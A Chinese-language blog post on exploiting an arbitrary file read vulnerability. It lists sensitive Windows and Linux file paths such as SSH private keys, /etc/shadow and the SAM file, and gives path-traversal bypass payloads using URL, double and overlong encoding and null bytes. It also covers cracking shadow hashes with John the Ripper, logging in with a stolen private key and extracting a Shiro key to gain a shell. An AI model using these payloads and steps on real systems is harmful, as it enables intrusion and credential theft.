文件读取漏洞后的深入利用姿势(建议收藏)

已于 2024-01-05 17:57:25 修改
阅读量1.2k 收藏 5
点赞数
文章标签: 开发语言 网络安全
于 2023-06-27 14:30:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Java_ZZZZZ/article/details/131416452
版权

当我们遇到任意文件读取漏洞的时候,我们需要考虑如何通过这一个小点去扩大我们的成果,达到最大化利用的目的。

本篇文章主要介绍了一些在我们拿到任意文件读取点后的深入利用姿势,希望对大家能有所帮助。

常见读取的敏感文件路径

windows

C:\\boot.ini //查看系统版本  
C:\\Windows\\System32\\inetsrv\\MetaBase.xml //IIS配置文件  
C:\\Windows\\repair\\sam //存储系统初次安装的密码  
C:\\Program Files\\mysql\\my.ini //Mysql配置  
C:\\Program Files\\mysql\\data\\mysql\\user.MYD //Mysql root  
C:\\Windows\\php.ini //php配置信息  
C:\\Windows\\my.ini //Mysql配置信息

Linux

/root/.ssh/authorized\_keys //如需登录到远程主机,需要到.ssh目录下,新建authorized\_keys文件,并将id\_rsa.pub内容复制进去  
/root/.ssh/id\_rsa //ssh私钥,ssh公钥是id\_rsa.pub  
/root/.ssh/id\_ras.keystore //记录每个访问计算机用户的公钥  
/root/.ssh/known\_hosts  
//ssh会把每个访问过计算机的公钥(public key)都记录在~/.ssh/known\_hosts。当下次访问相同计算机时,OpenSSH会核对公钥。如果公钥不同,OpenSSH会发出警告, 避免你受到DNS Hijack之类的攻击。  
/etc/passwd // 账户信息  
/etc/shadow // 账户密码文件  
/etc/my.cnf //mysql 配置文件  
/etc/httpd/conf/httpd.conf // Apache配置文件  
/etc/redhat-release 系统版本   
/root/.bash\_history //用户历史命令记录文件  
/root/.mysql\_history //mysql历史命令记录文件  
/var/lib/mlocate/mlocate.db //全文件路径  
/proc/self/fd/fd\[0-9\]\*(文件标识符)  
/proc/mounts //记录系统挂载设备  
/porc/config.gz //内核配置文件  
/porc/self/cmdline //当前进程的cmdline参数  
/proc/sched\_debug 配置文件可以看到当前运行的进程并可以获得对应进程的pid  
/proc/pid/cmdline   则可以看到对应pid进程的完整命令行。  
/proc/net/fib\_trie   内网IP  
/proc/self/environ   环境变量  
/proc/self/loginuid   当前用户

绕过思路

可以进行fuzz

url编码代替.或者/,如使用%2F代替/
?filename=..%2F..%2F..%2F..%2Fetc%2Fpasswd
二次编码(%25)
?filename=..%252F..%252F..%252F..%252Fetc%2Fpasswd
加入+
?filename=.+./.+./bin/redacted.dll
%00
?filename=.%00./file.php
/etc/passwd%00.jpg
\
?filename=..%5c..%5c/windows/win.ini
Java %c0%ae 安全模式绕过
?filename=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Linux下的常见利用姿势

用户目录下的敏感文件

.bash_history 
.zsh_history
.psql_history
.mysql_history
.profile 
.bashrc
.gitconfig
.viminfo

任意文件读取/etc/passwd
提取passwd第一列,即root等一系列用户名
读history:../../root/.bash_history
暴破所有用户的.bash_history:../../../home/§root§/.bash_history

历史命令重点关注出现的密码、路径、配置文件路径、其他关联IP、日志文件、war包、备份文件路径等等,可进一步读取或利用。

PS:如要下载文件,可能会导致过大文件下载失败,可以使用wget进行下载,比如catanlina.out日志文件、war包、备份文件等等。

主机凭证文件

私钥文件

/root/.ssh/id_rsa  私钥

/root/.ssh/authorized_keys  公钥存储文件
/root/.ssh/id_rsa.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥

私钥文件如果没有设定密码保护,便可直接获取到进行登录到服务器,或使用xshell等软件选择证书登录。

ssh -i id_rsa root@IP地址

系统密码

  • /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
......
用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell

可以看到哪些用户可以登录

  • /etc/shadow
root:$1$v2wT9rQF$XSpGgoB93STC4EFSlgpjg1:14181:0:99999:7:::
$id$salt$密文

id代表的是使用不同的加密算法,不同的系统使用的算法也不尽相同。salt是加密的时候需要用到盐。最后就是密文。

注意:如果密码字符串为*,表示系统用户不能被登入,为!表示用户名被禁用,如果密码字符串为空,表示没有密码。

  • 在线查询

  • https://www.cmd5.com/

  • john破解
    unshadow /etc/passwd /etc/shadow > test_passwd
    john --wordlist=字典路径 test_passw
    默认密码字典位于/usr/share/john/password.ls

全路径

mlocate.db数据库里存储了本地所有文件的配置信息
/var/lib/mlocate/mlocate.db

利用locate命令将数据输出成文件,这里面包含了全部的文件路径信息
locate mlocate.db config把包含config的路径全输出出来
locate mlocate.db webapps
locate mlocate.db www
获取到路径后可以进一步挖掘敏感信息和系统漏洞

程序源代码

利用全路径或者其他地方获取到的路径读取一些关键的程序源码。

读取WEB-INF/web.xml,进一步读取class文件,反编译得到源码。

读取war包,反编译获取源码。

应用配置文件

获取到网站的相关配置信息,包括站点配置、数据库配置等等,也可进一步获取到源码。

  • java站点
    /WEB-INF/web.xml
    /WEB-INF/classes/applicationContext.xml
    /WEB-INF/classes/xxx/xxx/xxx.class
    core.jar如果遇到Shiro站点,可以直接利用全路径找到core.jar,去下载core.jar,下载后反编译搜索Base64.decode直接找key,进而getshell。

  • tomcat
    /usr/local/tomcat/conf/tomcat-users.xml

  • nginx
    /www/nginx/conf/nginx.conf
    /etc/nginx/nginx.conf
    /usr/local/nginx/conf/nginx.conf
    /usr/local/etc/nginx/nginx.conf

  • apache
    /etc/httpd/conf/httpd.conf
    /etc/apache2/apache2.conf
    /etc/apache2/httpd.conf

  • redis
    /etc/redis.conf

  • ssh
    /etc/ssh/sshd_config

应用日志文件

利用日志文件获取网站后台地址、api接口、备份、等等敏感信息。

  • tomcat
    可以先找到/tomcat/bin/catalina.sh,里边有log的配置路径
    /webapps/ROOT/logs/catalina.out

  • apache
    /var/log/apache2/access.log
    /var/log/apache2/error.log
    /var/log/httpd/access_log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/error_log
    /etc/httpd/logs/error.log

  • nginx
    /var/log/nginx/access.log
    /var/log/nginx/error.log
    /usr/local/var/log/nginx/access.log
    /usr/local/nginx/logs

Windows下的利用姿势

盲读取桌面文件

有些时候,管理员会图方便,在桌面存储一些敏感的文件,我们可以直接对桌面的一些文件名进行fuzz,比如1.txt、2.txt、密码.txt、pass.txt等等,进一步扩大战果。

总结

在漏洞利用层面,除了去关注一键RCE,我们不妨也可以试着去思考一下其他类型漏洞的最大化利用。

当一个微小的漏洞和神奇的思路碰撞在一起,往往也能产生意想不到的效果。记住,发散你的思维,让漏洞发挥出最大的价值!

如果你也对网络安全&黑客感兴趣,这里给大家分享一份0基础入门网安学习资料。😝朋友们有需要的话,可以 V扫描文末二维码免费领取🆓

在这里插入图片描述

大模型应用场景
关注
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
2023年前端面试汇总-React
越陌度阡
06-29 889
React并不是将click事件绑定到了div的真实DOM上,而是在document处监听了所有的事件,当事件发生并且冒泡到document处的时候,React将事件内容封装并交由真正的处理函数运行。这样的方式不仅仅减少了内存的消耗,还能在组件挂在销毁时统一订阅和移除事件。除此之外,冒泡到document上的事件也不是原生的浏览器事件,而是由react自己实现的合成事件(SyntheticEvent)。因此如果不想要是事件冒泡的话应该调用event.preventDefault()方法,而不是调用event
网络安全漏洞挖掘之文件漏洞利用姿势
heikeyouyou的博客
05-13 442
记一次漏洞挖掘之文件漏洞利用姿势
php伪协议读取目录,PHP文件包含,文件读取利用思路,以及配合伪协议的trick...
weixin_31178795的博客
03-28 1375
PHP的文件包含函数有两类,分三种:12file_get_contents()include()/include_once() require/require_once()第一种用于获取文件的数据,第二种用于包含并执行代码与读取文件两种功能php写文件的函数1file_put_contents()基本的思路就是用来写shell吧,不过会有各种限制,但是结合伪协议就可以简单绕过了file_get_...
任意文件读取常用读取文件名(Windows&Linux)
最新发布
2301_77344663的博客
08-02 923
proc/[PID]/fd/[#] // 访问file descriptors,某写情况可以读取到进程正在使用的文件,比如access.log。/proc/net/tcp and /proc/net/udp // 活动连接的信息。/opt/nginx/conf/nginx.conf //nginx的配置文件。/etc/httpd/conf/httpd.conf //httpd的配置文件。/proc/[PID]/cwd // 当前进程的工作目录。
漏洞扫描和利用
helloworlddm的博客
09-20 961
声明:禁止用作非法目的,谢绝一切形式的转载。 在这里对OpenVas进行了简单的介绍。这篇文章着重介绍通过OpenVas扫描出来漏洞之后,如何利用这些漏洞达到获取被入侵机器"肉鸡"的shell(也就是控制权)。 OpenVas GSM协议 NTP – Time synchronization • Connecting to 123/udp • Mandatory • Not encrypted • May use internal NTP server Feeds (see below) • Direct
文件读取与操作
z202331720425的博客
03-27 826
我们程序的数据需要输出到各种外部设备,也需要从外部设备获取数据,不同的外部设备的输⼊输出 操作各不相同,为了⽅便程序员对各种设备进⾏⽅便的操作,我们抽象出了流的概念,我们可以把流 想象成流淌着字符的河。在编写程序的时候,在打开⽂件的同时,都会返回⼀个FILE*的指针变量指向该⽂件,也相当于建⽴了 指针和⽂件的关系。⽂件的内容不⼀定是程序,⽽是程序运⾏时读写的数据,⽐如程序运⾏需要从中读取数据的⽂件,或 者输出内容的⽂件。数据在内存中以⼆进制的形式存储,如果不加转换的输出到外存的⽂件中,就是⼆进制⽂件。
任意文件读取的深度利用
向阳-Y.的博客
04-12 1424
任意文件读取的深度利用 任意文件读取利用思路 有些文件需要高权限才能读取 /etc/passwd # 用户情况 /etc/shadow # 直接 John the Ripper /etc/hosts # 主机信息 /root/.bashrc # 环境变量 /root/.bash_history # 还有root外的其他用户 /root/.viminfo # vim 信息 /root/.ssh/id_rsa # 拿私钥直接ssh /proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为000
任意文件读取漏洞 利用指南
coderge's CSDN Blog.
04-21 6254
文章目录判断系统类型 (Linux的具体发行版)其他说明 (服务器进程权限判断)关于字典各字段的简要说明ApachetomcatNginxjettysystem procsshnetworkapplicationcommonprotocolSSRF 内网探测Windows 原文 https://woj.app/6663.html 基本思路就是尝试读取敏感文件以获取尽可能多的信息。 比如, /etc/issue 可以确认 Linux 主机的发行版, 其中 .bash_history, ssh相关路径 中可
上传绕过php文件改为图片,文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1354
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
【Go语言XML与JSON互转秘籍】:数据交换的正确姿势
[【Go语言XML与JSON互转秘籍】:数据交换的正确姿势](https://gocoding.org/wp-content/uploads/2020/12/JSON-Example-6.png) # 1. Go语言中的数据序列化与反序列化 ## 1.1 序列化与反序列化的基础概念 序列化是将...
教大家如何找XSS漏洞并且利用
liuhyusb的博客
06-19 1736
cross sitescript跨站脚本攻击,为了避免和css重复,就叫XSS了,是客户端脚本安全中的头号大敌。
漏洞挖掘-从任意文件读取漏洞到获取账户利用
m0_60571990的博客
03-07 1185
漏洞挖掘-从任意文件读取漏洞到获取账户利用
漏洞利用技术讲解,漏洞分析与利用技巧
白帽子凯哥聊黑客
12-07 2270
网络安全领域,我经常会被问到关于漏洞利用的问题。作为一个长期从事网络安全研究的小哥哥,我明白漏洞利用的重要性,将通过这篇文章分享给大家。
windows文件读取 xxe_XXE漏洞浅析
weixin_39808726的博客
12-22 340
XXE漏洞浅析来自于公众号:计算机与网络安全一次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍​微信公众号:计算机与网络安全ID:Computer-networkXML外部实体注入(XML External Entity)简称XXE漏洞,XML用于标记电子文件使其具有结构性的标记语言,可以用来标记...
***测试技巧总结更新篇2
weixin_33698823的博客
12-07 193
.LINUX常见路径: /etc/passwd /etc/shadow /etc/fstab /etc/host.conf /etc/motd /etc/ld.so.conf /var/www/htdocs/index.php /var/www/conf/httpd.conf /var/www/htdocs/index.html /var/httpd/...
windows文件读取 xxe_Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行……...
weixin_39551993的博客
12-22 670
原标题:Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行…… 你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。什么是XXE“简单来说,XXE就是XML...
微软IE本地文件读取漏洞
swordheart的博客
04-20 4157
漏洞详情 披露状态: 2010-08-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2010-08-02: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 微软IE在处理本地文件的访问时存在一些问题,结合微软windows的特性可能可以读取本地的某些特殊文件,可能有其他利用。 详细说明: 作为浏览器不可避免的要处理跨域的资源访问的问题,那么一些本身必须允许跨域的标签如iframe,script,style,而这些标签又允许解析某些格式的文件,如符合javascript语法的文件,符合
漏洞检查项)| 任意文件读取漏洞 file-read
Da1NtY的博客
06-25 254
存在文件读取的地方,通过修改文件路径来读取敏感文件
sudo mount -t nfs 192.168.10.5:/volume1/it /mnt/it 如何开机自动挂载
07-27
要实现开机自动挂载 NFS 共享目录,你可以将相关挂载命令添加到 `/etc/fstab` 文件中。以下是操作步骤: . 打开终端,以 root 权限编辑 `/etc/fstab` 文件。你可以使用文本编辑器(如 `vi` 或 `nano`)执行以下命令: ```bash sudo vi /etc/fstab ``` 2. 在文件的最后添加一行,指定 NFS 共享的挂载参数。行的格式如下: ``` <NFS服务器地址>:<共享路径> <本地挂载路径> nfs defaults 0 0 ``` 在你的示例中,应该是: ``` 192.168.10.5:/volume1/it /mnt/it nfs defaults 0 0 ``` 3. 保存并关闭文件。 4. 使用以下命令测试挂载是否成功: ```bash sudo mount -a ``` 如果没有错误提示,表示挂载成功。 现在,当你重新启动系统时,NFS 共享目录应该会自动挂载到 `/mnt/it` 目录。如果出现任何问题,可以检查 `/var/log/syslog` 日志文件以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值